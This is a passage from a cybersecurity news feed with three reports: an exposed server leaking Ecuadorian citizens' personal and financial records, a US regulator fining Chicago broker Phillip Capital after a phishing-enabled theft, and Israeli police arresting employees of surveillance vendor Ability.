Rotem and Locar wrote, "Although the exact details remain unclear, the leaked database appears to contain information obtained from outside sources. These sources may include Ecuadorian government registries, an automotive association called Aeade, and Biess, an Ecuadorian national bank."

A simple search of the leaked data would enable anyone to put together a list of wealthy Ecuadoreans that would be the envy of kidnappers everywhere. Taken as a whole, the data revealed not just who had large amounts of money in the bank but also where they lived, if they were married, if they had children, what cars they drove, and the license plates of their vehicles. 

Within the leaked records researchers also found an entry and national identification number for WikiLeaks founder Julian Assange, who was granted political asylum by Ecuador in 2012. 

Rotem and Locar found the exposed data in a number of files saved on a server located in Miami, Florida, which was set up and maintained by Ecuadorian marketing and analytics company Novaestrat

After discovering the data cache, vpnMentor contacted Novaestrat. The Ecuador Computer Emergency Security Team restricted access to the unsecured server on September 11, 2019. 

The breach follows a similar incident that took place recently in another South American country. Last month, a server was found that exposed the voter records of 80% of Chile's 14.3 million citizens.

Categories: Cyber Risk News

Chicago Broker Fined $1.5m for Inadequate Cybersecurity

Mon, 09/16/2019 - 15:57
Chicago Broker Fined $1.5m for Inadequate Cybersecurity

A US futures and securities clearing broker has been slapped with a $1.5m fine for failing to implement and enforce adequate cybersecurity measures. 

An investigation into Phillip Capital Incorporated (PCI) by the US Commodity Futures Trading Commission (CFTC) revealed a culture in which employees were not monitored to ensure that the cybersecurity of the business was protected and maintained.

Inadequate cybersecurity measures put in place within the Chicago-based company were found to be partially responsible for a data breach and the theft by cyber-criminals of $1m in PCI customer funds. 

The theft occurred when one of the company's IT engineers fell victim to a phishing email. The CFTC criticized PCI for taking too long to report the crime to customers after it happened in early 2018.  

On September 12, 2019, the CFTC issued an order that filed and simultaneously settled charges against PCI "for allowing cyber criminals to breach PCI email systems, access customer information, and successfully withdraw $1 million in PCI customer funds," and also for failing to disclose the breach to its customers "in a timely manner."

In a statement published on its website, the CFTC said that "the order finds that PCI failed to supervise its employees with respect to cybersecurity policy and procedures, a written information systems security program, and customer disbursements."

PCI was issued a civil monetary penalty of $500,000 and ordered to pay $1m in restitution. The broker was credited with the $1m restitution "based on its prompt reimbursement of the customer funds when the fraud was discovered."

The commission's investigation into PCI may be over, but the CFTC plans to keep an eye on the registered futures commission merchant's cybersecurity practices. The order filed by the CFTC requires PCI to provide reports to the commission on its remediation efforts. 

"Cybercrime is a real and growing threat in our markets," said CFTC director of enforcement James McDonald. "While it may not be possible to eliminate all cyber threats, CFTC registrants must have adequate procedures in place—and follow those procedures—to protect their customers and their accounts from potential harm."

Categories: Cyber Risk News

Israeli Cops Arrest Cyber Surveillance Vendor’s Employees

Mon, 09/16/2019 - 11:01
Israeli Cops Arrest Cyber Surveillance Vendor’s Employees

Israeli police have arrested several employees of a domestic company that makes cyber-surveillance tools and raided its offices over the weekend, according to local reports.

Although a court order has prevented many details of the case from making it into the public domain, including the identity of the suspects, the arrests were apparently made under charges of fraud, smuggling and money-laundering.

The individuals are thought to be staff at Ability Computer & Software Industries and Ability Security Systems, subsidiaries of Ability, which markets itself as providing interception technology for mobile cellular and satellite communications.

Founded in 1994 by “military and communication experts,” Ability claims to count governments, military, law enforcement and border control agencies as its customers.

However, there are suspicions that the firm may have broken Israeli laws around the export of specific security-related technologies, according to Haaretz.

The Israeli defense ministry is said to have suspended Ability subsidiaries from its official list of registered defense export companies after it exported geolocation systems without a license.

The firm is also facing a backlash from US regulator the SEC over an anti-fraud investigation dating back to 2017 about its 2015 merger with shelf company Cambridge Capital Acquisition Corporation.

Ability also paid out $3m last year to settle out-of-court with investors who said they’d been misled about the state of the firm’s finances.

The police investigation is being undertaken by the International Crime Investigations unit alongside the Director of Security of the Defense Establishment, according to the report.

The news comes just weeks after the Israeli government made moves to ease the process for exporting cyber-weapons to certain countries, despite warnings from the UN and others that such tools are being used by despotic governments to crack down on dissent.

Categories: Cyber Risk News

Pages